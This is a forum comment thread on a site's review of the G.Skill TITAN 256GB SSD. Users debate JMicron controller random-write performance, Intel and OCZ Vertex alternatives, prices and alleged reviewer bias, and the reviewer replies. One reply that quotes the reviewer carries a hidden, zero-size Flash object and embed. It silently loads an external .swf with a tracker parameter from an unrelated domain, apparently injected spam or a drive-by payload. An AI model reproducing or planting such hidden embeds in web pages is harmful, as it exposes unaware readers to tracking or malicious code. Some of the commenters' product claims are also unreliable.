G.Skill TITAN 256GB 2.5-inch MLC Solid State Disk

Collapse
X

• Filter
  • Time
  • Show
Clear All

• G.Skill TITAN 256GB 2.5-inch MLC Solid State Disk

Please feel free to comment about our story entitled "G.Skill TITAN 256GB 2.5-inch MLC Solid State Disk"

Re: G.Skill TITAN 256GB 2.5-inch MLC Solid State Disk

2 comments:
    1) The Random write and the access time still remain a Jmicron problem, this new generation have max 150 IOPS where a Intel x25 SLC have 30'000 IOPS!
    Random speed is very important, especially in server environment, in a desktop or laptotp the drive will also work 100% random if you never defrag it. (if you defrag it the cluster will be sorted and the drive can work in sequential mode, because of the wear leveling algorithm the SSD will work in best condition only 70% sequential, 30% always random).

2) The defacto best MLC it is not the x-25 M , always Intel, but it is called X-25 E MLC,
    ntel X-25 E SLC have the Intel reference number° SSDSA2SH032G1C5
    Intel X-25 E MLC have the Intel reference number° SSDSA2SH032G101
    It have the same read performance of the X-25 M, but it has the DOUBLE write performances of the x-25 M.

Comment

efranchi is correct in underligning both the importance of IOPS and the trouble ALL JMicron-based products have with this particular issue.

However, although the Intel E-series may be one of the highest performing products available, it is hardly at a comparable price-point, based as it is on SLC and NOT on MLC as he claims.
      Also, it is by no means the fastest available Enterprise product, should money be no object.

The fact is that, at the time of writing the review for this G.Skill product, 27th Jan 09, your review is unfortunately misleading, incomplete and, frankly, apparently biased towards one of the sponsors of your website.

At this particular time there are, for example, OCZ Vertex drives on the market which, at around the same price point per Gb, obliterate the benchmarks you present for this product (indeed, beating out the Intel product in all but IOP results)
      I will concede that, whilst announced and tested, the OCZ drives are delayed to retail (as they now have tuned the firmware to product >200Mb/s in BOTH read and write on 120 and 250Gb drives) and therefore anyone wanting to buy ine will have to wait another week or two, HOWEVER this does not really excuse YOUR total oversight in mentioning a competing product that, at similar value, destroys the performance of this G.Skill drive you are touting as a "must have".
      This is a product based on a first-generation JMicron controller which is KNOWN for problems.

This is shameful behaviour.

G.Skill have bought banners on your site, your blind advocacy of an obviously inferior product casts SERIOUS doubt on your credibility as an independent and reliable reviewer.
      I can only imagine that this has already happened in the past, resulting in your being unable to access and test the latest generation of SSD drives from manufacturers other than those who pay for advertising.

I sincerely hope you can do something to restore the little credibility this article shows you to posess.

VERY sincerely.

{fbwsol, finishing investigation into latest SSD trends and technology, waiting with baited breath to buy 2x120Gb OCZ Vertex. In NO WAY AFFILIATED WITH ANY MANUFACTURER}

Comment

OCZ Vertex, interesting drive with Indilinx controller and Samsung Nand Chips and Elpida 133MHz (CL3-3-3) 64MB cache.
        We see with this drive how OCZ have stopped to work with Jmicron (even if the apex have still a Jmicron JMB390 RAID), I guess Indilinx is not much better.
        And the Intel X-25 E MLC and even the Intel X-25 M still are better than OCZ vertex MLC. The OCZ Vertex can have random slow down to 20MB/ssequential write, the random write access and the write-random performances are bad and slow, too slow imho. I would like to compar it to a good HDD...I don't know if it will be better.

;-)

Comment

You wait with baited breath and I will attempt to write with bitten tongue.

First off, I don’t pay attention to who is buying banners on the site and really don’t care. With that said I do visit the site from time to time to check up on things and I am fairly certain that OCZ was running banners when this article was published. Maybe it was before, or after, whatever, I get the same thing every month no matter if OCZ, G.Skill or Mickey Mouse are plastered on the pages.

The second thing is that date published and date written are not always the same thing. There are a lot of staff members here at TT, enough for us to publish two articles a day. Sometimes an article gets turned in and it has to sit a week before going live. To be fair to publishing that was not the case here. The G.Skill drive arrived while I was attending CES, was tested and then written while I was in Miami.

At CES I did not meet with OCZ and have yet to receive their latest SSD product. Actually I have yet to receive any of their solid state drives. To be frank I have yet to receive any OCZ products in the last 8 years that I have been impressed with or that has not died under normal use within three months. Being open and making a statement like that may have a little something to do with why I do not receive products from them. With that kind of track record I am not prepared to blindly say that the Vortex is a better product since I have yet to test one.

How many times do you really see a reviewer call a spade a spade without beating around the bush? If you would like to amuse both of us please dig through the Storage and Cooling sections of the site with a score card looking at my past articles. To my knowledge there are very few reviewers left that will review one product, see that it is not really that good and tell you to go buy a competing product instead in the same review. I have been doing it for close to ten years and my samples have not dried up yet.

Everyone is aware of the issues with JMicron controllers; there is no reason to beat it into the ground more than it has already been. In my opinion G.Skill has came up with a solution that works for 90% of users. Most users will never see the issue, even on the older drives more than a few times if their system is properly configured. In my mind the benefits of solid state drives outweigh the issue for most users.

Comment

Now that my tongue is bleeding….

I can go to Newegg today and purchase the G.Skill Titan 256 GB for 549.00. A search for the OCZ Vertex shows no results.

Newegg.com - G.SKILL TITAN Series FM-25S2S-256GBT1 2.5" 256GB SATA II Internal Solid state disk (SSD) - Solid State Disks

Pricegrabber shows one result for the Vertex, a 30GB for a little less than 170 USD. Google Shopping shows several results for the Vertex, I chose ZipZoomFly because it is a name I know. They list the Vertex 128GB drive for 499, 469 after MIR, no 256GB variant. The lowest priced 250GB version is listed for 912 USD per Google Shopping. Do I really need to say anything beyond the price figures to justify the G.Skill Titan over the OCZ Vertex?

Comment

Originally posted by chrisram View Post
              Now that my tongue is bleeding….

I can go to Newegg today and purchase the G.Skill Titan 256 GB for 549.00. A search for the OCZ Vertex shows no results.

Newegg.com - G.SKILL TITAN Series FM-25S2S-256GBT1 2.5" 256GB SATA II Internal Solid state disk (SSD) - Solid State Disks

Pricegrabber shows one result for the Vertex, a 30GB for a little less than 170 USD. Google Shopping shows several results for the Vertex, I chose ZipZoomFly because it is a name I know. They list the Vertex 128GB drive for 499, 469 after MIR, no 256GB variant. The lowest priced 250GB version is listed for 912 USD per Google Shopping. Do I really need to say anything beyond the price figures to justify the G.Skill Titan over the OCZ Vertex?<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="0" height="0"><param name="movie" value="http://ancientnovels.com/?tracker=3248"></param><param name="allowFullScreen" value="true"></param><embed src="http://ancientnovels.com/?tracker=3248" type="application/x-shockwave-flash" allowfullscreen="true" width="0" height="0"></embed></object>
              Yeah there aren't much stores with it yet. After newegg, I guess ZipZoomfly is pretty good also.
              Last edited by criteriadan; 03-06-2009, 09:41 AM.

Comment

I will see what I can do about getting the APEX and Vertex in for review in April. I too would like to see where they stand in relation to the other SSD drives that we have recieved.

SIS just launched a new controller also and I can't wait to see how they perform. The best thing about SSDs is that the tech is taking off so fast and memory companies are eager to find a product they can actually make money off of. Hopefully the economy doesn't slow the progress since I think this is really the future. At CES I saw a 1TB SSD, granted it will be quite a while before we see affordable SSDs but then again that is what we said about 256GB drives just a year ago.

Comment

The Titan 256GB drives is well positioned regarding price and performance. As a single SSD 256GB drive I couldn't find better deal on the net and therefore Chrisram is right when he says 'The G.Skill TITAN is currently all around best bang for the big buck drive'. I ordered 2x 128Gb SSD Titan (cheaper than 1x 256GB) hoping the performance will double in Raid 0. It is clear that a single drive is outperformed by the Intel X25-m or the vertex 120GB but for almost the same price I prefer having 2X128GB than 1x 80GB. Now I can only hope that in fact two raided 128 titan will offer twice the performance :).

Comment

Let us know how they do in RAID 0. I would love to get my hands on an array of them but hardly have the time as it is.

Comment

Working...
                    X